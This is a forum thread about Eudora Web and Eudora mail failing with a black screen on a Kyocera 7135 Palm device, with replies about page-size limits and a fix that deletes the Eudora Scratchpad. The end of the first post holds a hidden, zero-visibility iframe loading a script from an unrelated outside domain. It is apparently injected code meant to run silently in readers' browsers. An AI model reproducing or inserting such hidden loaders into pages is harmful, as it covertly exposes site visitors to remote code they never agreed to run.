+ Reply to Thread

Eudora Web belly up on the 7135

Just used Eudora Web last night via express network connection. tonight i tapped on the icon and nothing but a black screen. Interestingly enough, the same thing happened when i tapped on the eudora mail icon. It brought up the inbox with the initial message but when i clicked on it the screen went black.

Had to do a soft reset to get back to the palm. I will do a reinstall tomorrow at work. Incidently, I did a hard reset and restored from my card to no evail.

EIS (not eudora) Web Browser still works but i prefer eudora because its much faster and more consistent (until now)

Has anyone else had any problems?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

pdageek,

The only problem I have seen (and I prefer Eudora for speed as well) is that when browsing long threads in this forum -- it quits usually at 50K when there's 90K of posts. Not sure if it sees something it can't handle on the page or there's another probem.

I haven't tried posting yet.

T-mobile has a server that compresses all images using GPRS -- does Verizon have something similar? I used this on my laptop and it's nice, but Express Network is fast enough that you don't need it on a laptop. It would certainly help on the PDA with EIS.

Glenn

I'm not sure if this was related to restoring from BackupBuddy or not but deleting the Eudora Scratchpad fixed it.